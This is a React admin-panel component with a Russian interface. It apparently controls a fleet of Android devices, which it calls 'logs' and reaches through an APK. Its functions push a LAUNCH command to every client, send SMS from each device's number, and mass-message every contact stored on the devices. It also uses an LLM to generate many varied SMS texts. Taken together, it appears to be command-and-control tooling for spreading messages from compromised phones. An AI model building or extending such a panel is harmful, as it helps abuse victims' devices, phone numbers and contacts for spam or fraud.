import { api } from '@/api/http';
import LoadingWrapper from '@/components/loading-wrapper';
import { Button } from '@/components/ui/button';
import { ButtonGroup } from '@/components/ui/button-group';
import { Card, CardContent, CardDescription, CardHeader, CardTitle } from '@/components/ui/card';
import { Dialog, DialogContent, DialogDescription, DialogFooter, DialogHeader, DialogTitle } from '@/components/ui/dialog';
import { Input } from '@/components/ui/input';
import { Label } from '@/components/ui/label';
import {
	Select,
	SelectContent,
	SelectItem,
	SelectTrigger,
	SelectValue,
} from '@/components/ui/select';
import { Textarea } from '@/components/ui/textarea';
import { parseBulkTexts, validateBulkTexts, BULK_CONTACT_SMS_TEXTS_MAX } from '@/lib/bulk-texts';
import { formatApiError } from '@/lib/format-api-error';
import {
	DEFAULT_BULK_SMS_PROMPT_TEMPLATE,
	LLM_PROVIDER_DEFAULT_MODEL,
	LLM_PROVIDER_MODELS,
	LLM_PROVIDERS,
	type LlmProvider,
} from '@/lib/llm-providers';
import { cn } from '@/lib/utils';
import axios from 'axios';
import { LayersIcon, MessageSquareIcon, SparklesIcon, UsersIcon } from 'lucide-react';
import { useMemo, useRef, useState, type KeyboardEvent } from 'react';
import { toast } from 'sonner';

type BulkResult = { created: number; skipped: number; total: number };
type BulkContactResult = BulkResult & { campaignId: string };
type BulkContactCancelResult = { cancelled: number; skipped: number; total: number };
type ConfirmType = 'launch' | 'sms' | 'contact-sms' | null;
type TargetScope = 'online' | 'all';

export default function BulkActionsWidget() {
	const [isLoading, setIsLoading] = useState(false);
	const [isGenerating, setIsGenerating] = useState(false);
	const [confirmType, setConfirmType] = useState<ConfirmType>(null);
	const [recipient, setRecipient] = useState('');
	const [text, setText] = useState('');
	const [contactTextsRaw, setContactTextsRaw] = useState('');
	const [targetScope, setTargetScope] = useState<TargetScope>('online');
	const [campaignId, setCampaignId] = useState<string | null>(null);
	const [openAiKey, setOpenAiKey] = useState('');
	const [openAiSample, setOpenAiSample] = useState('');
	const [openAiCount, setOpenAiCount] = useState(5);
	const [showOpenAi, setShowOpenAi] = useState(false);
	const [llmProvider, setLlmProvider] = useState<LlmProvider>('openai');
	const [llmModel, setLlmModel] = useState(LLM_PROVIDER_DEFAULT_MODEL.openai);
	const [promptTemplate, setPromptTemplate] = useState(DEFAULT_BULK_SMS_PROMPT_TEMPLATE);
	const [generateError, setGenerateError] = useState<string | null>(null);
	const fileInputRef = useRef<HTMLInputElement>(null);

	const contactTexts = useMemo(() => parseBulkTexts(contactTextsRaw), [contactTextsRaw]);
	const contactTextsMaxLen = useMemo(
		() => (contactTexts.length > 0 ? Math.max(...contactTexts.map(text => text.length)) : 0),
		[contactTexts],
	);
	const isSmsValid = recipient.trim().length > 0 && text.trim().length > 0;
	const isContactSmsValid = contactTexts.length > 0;

	async function handleBulkLaunch() {
		setIsLoading(true);
		try {
			const { data } = await api.post<BulkResult>('/bulk-launch');
			toast.success(`Launch: создано ${data.created}, пропущено ${data.skipped} из ${data.total}`);
		} finally {
			setIsLoading(false);
			setConfirmType(null);
		}
	}

	async function handleBulkSms() {
		setIsLoading(true);
		try {
			const { data } = await api.post<BulkResult & { recipient: string }>('/bulk-sms', {
				recipient: recipient.trim(),
				text: text.trim(),
			});
			toast.success(`SMS: создано ${data.created}, пропущено ${data.skipped} из ${data.total}`);
			setRecipient('');
			setText('');
		} finally {
			setIsLoading(false);
			setConfirmType(null);
		}
	}

	async function handleBulkContactSms() {
		const validationError = validateBulkTexts(contactTexts);
		if (validationError) {
			toast.error(validationError);
			return;
		}

		setIsLoading(true);
		try {
			const { data } = await api.post<BulkContactResult>('/bulk-contact-sms', {
				texts: contactTexts,
				targetScope,
				skipExisting: true,
			});
			setCampaignId(data.campaignId);
			toast.success(
				`Рассылка по контактам: создано ${data.created}, пропущено ${data.skipped} из ${data.total}`,
			);
		} finally {
			setIsLoading(false);
			setConfirmType(null);
		}
	}

	async function handleCancelContactSms() {
		if (!campaignId) return;
		setIsLoading(true);
		try {
			const { data } = await api.post<BulkContactCancelResult>('/bulk-contact-sms/cancel', { campaignId });
			toast.success(`Отменено ${data.cancelled} из ${data.total} неотправленных задач`);
			if (data.cancelled > 0) {
				setCampaignId(null);
			}
		} finally {
			setIsLoading(false);
		}
	}

	function preventEnterSubmit(e: KeyboardEvent) {
		if (e.key === 'Enter') {
			e.preventDefault();
		}
	}

	function handleLlmProviderChange(provider: LlmProvider) {
		setLlmProvider(provider);
		setLlmModel(LLM_PROVIDER_DEFAULT_MODEL[provider]);
		setGenerateError(null);
	}

	async function handleGenerateTexts() {
		if (!openAiKey.trim() || !openAiSample.trim()) {
			return toast.error('Укажите API-ключ и образец текста');
		}
		setGenerateError(null);
		setIsGenerating(true);
		try {
			const { data } = await api.post<{ texts: string[] }>(
				'/bulk-contact-sms/generate-texts',
				{
					apiKey: openAiKey.trim(),
					sampleText: openAiSample.trim(),
					count: openAiCount,
					provider: llmProvider,
					model: llmModel,
					promptTemplate: promptTemplate.trim(),
				},
				{ suppressConnectionOverlay: true, suppressToast: true },
			);
			setContactTextsRaw(data.texts.join('\n\n'));
			toast.success(`Сгенерировано ${data.texts.length} вариантов`);
		} catch (error) {
			if (axios.isAxiosError(error)) {
				setGenerateError(formatApiError(error.response?.data) ?? 'Не удалось сгенерировать тексты');
			} else {
				setGenerateError('Не удалось сгенерировать тексты');
			}
		} finally {
			setIsGenerating(false);
		}
	}

	function handleTxtUpload(e: React.ChangeEvent<HTMLInputElement>) {
		const file = e.target.files?.[0];
		if (!file) return;
		const reader = new FileReader();
		reader.onload = () => {
			if (typeof reader.result === 'string') {
				setContactTextsRaw(reader.result);
			}
		};
		reader.readAsText(file);
		e.target.value = '';
	}

	function handleConfirmContactSms() {
		const validationError = validateBulkTexts(contactTexts);
		if (validationError) {
			toast.error(validationError);
			return;
		}
		setConfirmType('contact-sms');
	}

	function handleConfirm() {
		if (confirmType === 'launch') handleBulkLaunch();
		else if (confirmType === 'sms') handleBulkSms();
		else if (confirmType === 'contact-sms') handleBulkContactSms();
	}

	const scopeLabel = targetScope === 'online' ? 'только онлайн-логи' : 'все логи';

	return (
		<>
			<Card className='gap-0 py-0 shadow-sm overflow-hidden'>
				<CardHeader className='border-b px-4 py-4 flex'>
					<div className='flex items-center gap-3'>
						<div className='rounded-lg bg-chart-3/15 p-2'>
							<LayersIcon className='text-chart-3' size={20} />
						</div>
						<div>
							<CardTitle className='text-chart-3'>Массовые операции</CardTitle>
							<CardDescription>Launch и SMS для всех клиентов</CardDescription>
						</div>
					</div>
				</CardHeader>

				<LoadingWrapper show={isLoading}>
					<CardContent className='px-4 py-4 flex flex-col gap-6'>
						<div className='flex flex-col gap-3'>
							<div className='flex items-center gap-2'>
								<LayersIcon size={16} className='text-muted-foreground' />
								<span className='font-medium text-sm'>Launch для всех клиентов</span>
							</div>
							<p className='text-sm text-muted-foreground'>
								Создаёт LAUNCH-команду для <strong>всех клиентов</strong> в базе. Офлайн-устройства получат команду при
								подключении. Клиенты с уже активной командой будут пропущены.
							</p>
							<Button type='button' className='w-full' variant='outline' onClick={() => setConfirmType('launch')}>
								Запросить Launch для всех
							</Button>
						</div>

						<div className='border-t border-border' />

						<div className='flex flex-col gap-3'>
							<div className='flex items-center gap-2'>
								<MessageSquareIcon size={16} className='text-muted-foreground' />
								<span className='font-medium text-sm'>SMS со всех онлайн-номеров</span>
							</div>
							<p className='text-sm text-muted-foreground'>
								Отправляет SMS с <strong>каждого онлайн-номера</strong> на указанный номер. Офлайн-устройства не участвуют.
							</p>
							<div className='flex flex-col gap-1.5'>
								<Label className='text-sm'>Номер получателя</Label>
								<Input placeholder='998XXXXXXXXX' value={recipient} onChange={e => setRecipient(e.target.value)} />
							</div>
							<div className='flex flex-col gap-1.5'>
								<Label className='text-sm'>Текст сообщения</Label>
								<Textarea
									className='min-h-[80px]'
									placeholder='Текст SMS...'
									value={text}
									onChange={e => setText(e.target.value)}
								/>
							</div>
							<Button type='button' className='w-full' disabled={!isSmsValid} onClick={() => setConfirmType('sms')}>
								Отправить со всех номеров
							</Button>
						</div>

						<div className='border-t border-border' />

						<div className='flex flex-col gap-3'>
							<div className='flex items-center gap-2'>
								<UsersIcon size={16} className='text-muted-foreground' />
								<span className='font-medium text-sm'>Рассылка по контактам</span>
							</div>
							<p className='text-sm text-muted-foreground'>
								Отправляет SMS <strong>всем контактам</strong> с каждого номера. Несколько текстов распределяются по
								логам/номерам по очереди. Логи без <code className='text-xs'>contactsEnabled</code> пропускаются.
							</p>

							<div className='flex flex-col gap-1.5'>
								<div className='flex items-center justify-between gap-2'>
									<Label className='text-sm'>Тексты SMS</Label>
									<span className='text-xs text-muted-foreground'>
										{contactTexts.length > 0
											? `${contactTexts.length} вариант(ов), макс. ${contactTextsMaxLen} симв.`
											: 'нет текстов'}
									</span>
								</div>
								<Textarea
									className='min-h-[120px]'
									placeholder='Один текст или несколько — разделяйте пустой строкой (двойной Enter)'
									value={contactTextsRaw}
									onChange={e => setContactTextsRaw(e.target.value)}
								/>
								<div className='flex gap-2'>
									<input
										ref={fileInputRef}
										type='file'
										accept='.txt,text/plain'
										className='hidden'
										onChange={handleTxtUpload}
									/>
									<Button type='button' variant='outline' size='sm' onClick={() => fileInputRef.current?.click()}>
										Загрузить .txt
									</Button>
									<Button type='button' variant='outline' size='sm' onClick={() => setShowOpenAi(v => !v)}>
										<SparklesIcon size={14} className='mr-1' />
										AI
									</Button>
								</div>
							</div>

							{showOpenAi ? (
								<div className='rounded-lg border border-border p-3 flex flex-col gap-2 bg-muted/30'>
									<Label className='text-sm font-medium'>Генерация вариантов (AI)</Label>

									<div className='flex flex-col gap-1.5'>
										<Label className='text-sm'>Провайдер</Label>
										<ButtonGroup>
											{LLM_PROVIDERS.map(provider => (
												<Button
													key={provider.id}
													type='button'
													variant={llmProvider === provider.id ? 'secondary' : 'outline'}
													size='sm'
													onClick={() => handleLlmProviderChange(provider.id)}
												>
													{provider.label}
												</Button>
											))}
										</ButtonGroup>
									</div>

									<div className='flex flex-col gap-1.5'>
										<Label className='text-sm'>Модель</Label>
										<Select
											value={llmModel}
											onValueChange={value => {
												setLlmModel(value);
												setGenerateError(null);
											}}
										>
											<SelectTrigger className='w-full'>
												<SelectValue />
											</SelectTrigger>
											<SelectContent>
												{LLM_PROVIDER_MODELS[llmProvider].map(model => (
													<SelectItem key={model} value={model}>
														{model}
													</SelectItem>
												))}
											</SelectContent>
										</Select>
										<p className='text-xs text-muted-foreground'>
											По умолчанию: {LLM_PROVIDER_DEFAULT_MODEL[llmProvider]}
										</p>
										{llmProvider === 'deepseek' ? (
											<p className='text-xs text-muted-foreground'>
												vision-exp — для изображений; для SMS обычно flash или pro.
											</p>
										) : null}
									</div>

									<div className='flex flex-col gap-1.5'>
										<div className='flex items-center justify-between gap-2'>
											<Label className='text-sm'>Промпт</Label>
											<Button
												type='button'
												variant='ghost'
												size='sm'
												className='h-auto py-0 px-2 text-xs'
												onClick={() => setPromptTemplate(DEFAULT_BULK_SMS_PROMPT_TEMPLATE)}
											>
												Сбросить промпт
											</Button>
										</div>
										<Textarea
											className='min-h-[120px] text-xs font-mono'
											value={promptTemplate}
											onChange={e => setPromptTemplate(e.target.value)}
											onKeyDown={preventEnterSubmit}
										/>
										<p className='text-xs text-muted-foreground'>
											Плейсхолдеры: {'{{count}}'}, {'{{sampleText}}'}
										</p>
									</div>

									<Label className='text-sm'>API-ключ</Label>
									<Input
										type='password'
										placeholder='sk-...'
										value={openAiKey}
										onChange={e => setOpenAiKey(e.target.value)}
										onKeyDown={preventEnterSubmit}
										autoComplete='off'
									/>
									<Label className='text-sm'>Образец текста</Label>
									<Textarea
										className='min-h-[60px]'
										placeholder='Текст для генерации вариантов...'
										value={openAiSample}
										onChange={e => setOpenAiSample(e.target.value)}
										onKeyDown={preventEnterSubmit}
									/>
									<div className='flex items-center gap-2'>
										<Label className='text-sm shrink-0'>Количество</Label>
										<Input
											type='number'
											min={1}
											max={50}
											className='w-20'
											value={openAiCount}
											onChange={e =>
												setOpenAiCount(
													Math.min(BULK_CONTACT_SMS_TEXTS_MAX, Math.max(1, Number(e.target.value) || 1)),
												)
											}
											onKeyDown={preventEnterSubmit}
										/>
										<Button
											type='button'
											size='sm'
											disabled={isGenerating}
											onClick={handleGenerateTexts}
										>
											{isGenerating ? 'Генерация...' : 'Сгенерировать'}
										</Button>
									</div>
									{generateError ? (
										<p className='text-destructive text-sm'>{generateError}</p>
									) : null}
									<p className='text-xs text-muted-foreground'>Ключ не сохраняется на сервере.</p>
								</div>
							) : null}

							<div className='flex flex-col gap-1.5'>
								<Label className='text-sm'>Целевые логи</Label>
								<ButtonGroup>
									<Button
										type='button'
										variant={targetScope === 'online' ? 'secondary' : 'outline'}
										size='sm'
										onClick={() => setTargetScope('online')}
									>
										Только онлайн
									</Button>
									<Button
										type='button'
										variant={targetScope === 'all' ? 'secondary' : 'outline'}
										size='sm'
										onClick={() => setTargetScope('all')}
									>
										Все логи
									</Button>
								</ButtonGroup>
							</div>

							<p className='text-xs text-muted-foreground'>
								Отмена снимает только задачи, ещё не доставленные на устройство (status 0). Уже запущенные рассылки на
								APK не прерываются.
							</p>

							<div className='flex flex-col gap-2'>
								<Button
									type='button'
									className='w-full'
									disabled={!isContactSmsValid}
									onClick={handleConfirmContactSms}
								>
									Запустить рассылку по контактам
								</Button>
								{campaignId ? (
									<Button type='button' className='w-full' variant='outline' onClick={handleCancelContactSms}>
										Отменить неотправленные
									</Button>
								) : null}
							</div>
						</div>
					</CardContent>
				</LoadingWrapper>
			</Card>

			<Dialog open={confirmType !== null} onOpenChange={open => !open && setConfirmType(null)}>
				<DialogContent className='sm:max-w-[440px]'>
					<DialogHeader>
						<DialogTitle>
							{confirmType === 'launch'
								? 'Подтвердить Launch для всех клиентов'
								: confirmType === 'contact-sms'
									? 'Подтвердить рассылку по контактам'
									: 'Подтвердить массовую отправку SMS'}
						</DialogTitle>
						<DialogDescription>
							{confirmType === 'launch' ? (
								<>
									Будет создана LAUNCH-команда для <strong>всех клиентов</strong> в базе. Клиенты с уже активной командой
									будут пропущены. Это действие нельзя отменить.
								</>
							) : confirmType === 'contact-sms' ? (
								<>
									Будет создана рассылка по контактам для <strong>{scopeLabel}</strong> с{' '}
									<strong>{contactTexts.length}</strong> вариант(ами) текста. Пример: «
									{contactTexts[0]?.slice(0, 80)}
									{contactTexts[0] && contactTexts[0].length > 80 ? '…' : ''}». Логи с уже ожидающей рассылкой будут
									пропущены.
								</>
							) : (
								<>
									SMS будет отправлено с <strong>каждого онлайн-номера</strong> на номер{' '}
									<strong>{recipient.trim()}</strong> с текстом: «{text.trim()}». Это действие нельзя отменить.
								</>
							)}
						</DialogDescription>
					</DialogHeader>
					<DialogFooter>
						<Button type='button' variant='outline' onClick={() => setConfirmType(null)}>
							Отмена
						</Button>
						<Button
							type='button'
							variant={confirmType === 'contact-sms' ? 'default' : 'destructive'}
							className={cn(confirmType === 'contact-sms' && 'bg-primary')}
							onClick={handleConfirm}
						>
							Подтвердить
						</Button>
					</DialogFooter>
				</DialogContent>
			</Dialog>
		</>
	);
}
